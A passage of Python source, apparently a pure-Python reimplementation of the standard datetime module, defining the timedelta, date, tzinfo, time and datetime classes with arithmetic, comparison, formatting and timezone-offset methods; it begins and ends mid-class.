returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds', '_hashcode'
def __new__(cls, days=_SENTINEL, seconds=_SENTINEL, microseconds=_SENTINEL,
milliseconds=_SENTINEL, minutes=_SENTINEL, hours=_SENTINEL, weeks=_SENTINEL):
x = 0
leftover = 0.0
if microseconds is not _SENTINEL:
x, leftover = _accum("microseconds", x, microseconds, _US_PER_US, leftover)
if milliseconds is not _SENTINEL:
x, leftover = _accum("milliseconds", x, milliseconds, _US_PER_MS, leftover)
if seconds is not _SENTINEL:
x, leftover = _accum("seconds", x, seconds, _US_PER_SECOND, leftover)
if minutes is not _SENTINEL:
x, leftover = _accum("minutes", x, minutes, _US_PER_MINUTE, leftover)
if hours is not _SENTINEL:
x, leftover = _accum("hours", x, hours, _US_PER_HOUR, leftover)
if days is not _SENTINEL:
x, leftover = _accum("days", x, days, _US_PER_DAY, leftover)
if weeks is not _SENTINEL:
x, leftover = _accum("weeks", x, weeks, _US_PER_WEEK, leftover)
if leftover != 0.0:
x += _round(leftover)
return cls._from_microseconds(x)
@classmethod
def _from_microseconds(cls, us):
s, us = divmod(us, _US_PER_SECOND)
d, s = divmod(s, _SECONDS_PER_DAY)
return cls._create(d, s, us, False)
@classmethod
def _create(cls, d, s, us, normalize):
if normalize:
s, us = _normalize_pair(s, us, 1000000)
d, s = _normalize_pair(d, s, 24*3600)
if not -_MAX_DELTA_DAYS <= d <= _MAX_DELTA_DAYS:
raise OverflowError("days=%d; must have magnitude <= %d" % (d, _MAX_DELTA_DAYS))
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def _to_microseconds(self):
return ((self._days * _SECONDS_PER_DAY + self._seconds) * _US_PER_SECOND +
self._microseconds)
def __repr__(self):
module = "datetime." if self.__class__ is timedelta else ""
if self._microseconds:
return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s(%d, %d)" % (module + self.__class__.__name__,
self._days,
self._seconds)
return "%s(%d)" % (module + self.__class__.__name__, self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
# return self._to_microseconds() / 10**6
return float(self._to_microseconds()) / float(10**6)
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds,
True)
return NotImplemented
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds,
True)
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(-self._days,
-self._seconds,
-self._microseconds,
True)
def __pos__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days,
self._seconds,
self._microseconds,
False)
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if not isinstance(other, (int, long)):
return NotImplemented
usec = self._to_microseconds()
return timedelta._from_microseconds(usec * other)
__rmul__ = __mul__
def __div__(self, other):
if not isinstance(other, (int, long)):
return NotImplemented
usec = self._to_microseconds()
# return timedelta._from_microseconds(usec // other)
return timedelta._from_microseconds(int(usec) / int(other))
__floordiv__ = __div__
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __nonzero__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-_MAX_DELTA_DAYS)
timedelta.max = timedelta(_MAX_DELTA_DAYS, 24*3600-1, 1000000-1)
timedelta.resolution = timedelta(microseconds=1)
class date(object):
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__cmp__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
# if month is None and isinstance(year, bytes) and len(year) == 4 and \
# 1 <= ord(year[2]) <= 12:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(year)
# self._hashcode = -1
# return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Contruct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
module = "datetime." if self.__class__ is date else ""
return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
# def strftime(self, format):
# "Format using strftime()."
# return _wrap_strftime(self, format, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
# return "%04d-%02d-%02d" % (self._year, self._month, self._day)
return "%s-%s-%s" % (str(self._year).zfill(4), str(self._month).zfill(2), str(self._day).zfill(2))
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __cmp__, __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
return date.__new__(type(self), year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, date):
return self._cmp(other) != 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
# Computations
def _add_timedelta(self, other, factor):
y, m, d = _normalize_date(
self._year,
self._month,
self._day + other.days * factor)
return date(y, m, d)
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
return self._add_timedelta(other, 1)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta._create(days1 - days2, 0, 0, False)
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return (_struct.pack('4B', yhi, ylo, self._month, self._day),)
def __setstate(self, string):
yhi, ylo, self._month, self._day = (ord(string[0]), ord(string[1]),
ord(string[2]), ord(string[3]))
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo(object):
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
if dtdst:
return dt + dtdst
else:
return dt
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time(object):
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
# if isinstance(hour, bytes) and len(hour) == 6 and ord(hour[0]) < 24:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(hour, minute or None)
# self._hashcode = -1
# return self
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, time):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self._utcoffset()
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware times")
myhhmm = self._hour * 60 + self._minute - myoff
othhmm = other._hour * 60 + other._minute - otoff
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
if self._hashcode == -1:
tzoff = self._utcoffset()
if not tzoff: # zero or None
self._hashcode = hash(self._getstate()[0])
else:
h, m = divmod(self.hour * 60 + self.minute - tzoff, 60)
if 0 <= h < 24:
self._hashcode = hash(time(h, m, self.second, self.microsecond))
else:
self._hashcode = hash((h, m, self.second, self.microsecond))
return self._hashcode
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
module = "datetime." if self.__class__ is time else ""
s= "%s(%d, %d%s)" % (module + self.__class__.__name__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
# def strftime(self, format):
# """Format using strftime(). The date part of the timestamp passed
# to underlying strftime should not be used.
# """
# # The year must be >= _MINYEARFMT else Python's strftime implementation
# # can raise a bogus exception.
# timetuple = (1900, 1, 1,
# self._hour, self._minute, self._second,
# 0, 1, -1)
# return _wrap_strftime(self, format, timetuple)
def __format__(self, fmt):
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return time.__new__(type(self),
hour, minute, second, microsecond, tzinfo)
def __nonzero__(self):
if self.second or self.microsecond:
return True
offset = self._utcoffset() or 0
return self.hour * 60 + self.minute != offset
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('6B', self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
self._hour, self._minute, self._second, us1, us2, us3 = (
ord(string[0]), ord(string[1]), ord(string[2]),
ord(string[3]), ord(string[4]), ord(string[5]))
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints or longs.
"""
__slots__ = date.__slots__ + time.__slots__
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
# if isinstance(year, bytes) and len(year) == 10 and \
# 1 <= ord(year[2]) <= 12:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(year, month)
# self._hashcode = -1
# return self
year, month, day = _check_date_fields(year, month, day)
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def fromtimestamp(cls, timestamp, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
converter = _time.localtime if tz is None else _time.gmtime
self = cls._from_timestamp(converter, timestamp, tz)
if tz is not None:
self = tz.fromutc(self)
return self
@classmethod
def utcfromtimestamp(cls, t):
"Construct a UTC datetime from a POSIX timestamp (like time.time())."
return cls._from_timestamp(_time.gmtime, t, None)
@classmethod
def _from_timestamp(cls, converter, timestamp, tzinfo):
t_full = timestamp
timestamp = int(_math.floor(timestamp))
frac = t_full - timestamp
us = _round(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
timestamp += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = converter(timestamp)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us, tzinfo)
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self._dst()
if dst is None:
dst = -1
elif dst:
dst = 1
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
offset = self._utcoffset()
if offset: # neither None nor 0
mm -= offset
y, m, d, hh, mm, ss, _ = _normalize_datetime(
y, m, d, hh, mm, ss, 0, ignore_overflow=True)
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return datetime.__new__(type(self),
year, month, day, hour, minute, second,
microsecond, tzinfo)
def astimezone(self, tz):
if not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = ", ".join(map(str, L))
module = "datetime." if self.__class__ is datetime else ""
s = "%s(%s)" % (module + self.__class__.__name__, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
# @classmethod
# def strptime(cls, date_string, format):
# 'string, format -> new datetime parsed from a string (like time.strptime()).'
# from _strptime import _strptime
# # _strptime._strptime returns a two-element tuple. The first
# # element is a time.struct_time object. The second is the
# # microseconds (which are not defined for time.struct_time).
# struct, micros = _strptime(date_string, format)
# return cls(*(struct[0:6] + (micros,)))
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other) == 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, datetime):
return self._cmp(other) != 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
if mytz is not None:
myoff = self._utcoffset()
if ottz is not None:
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def _add_timedelta(self, other, factor):
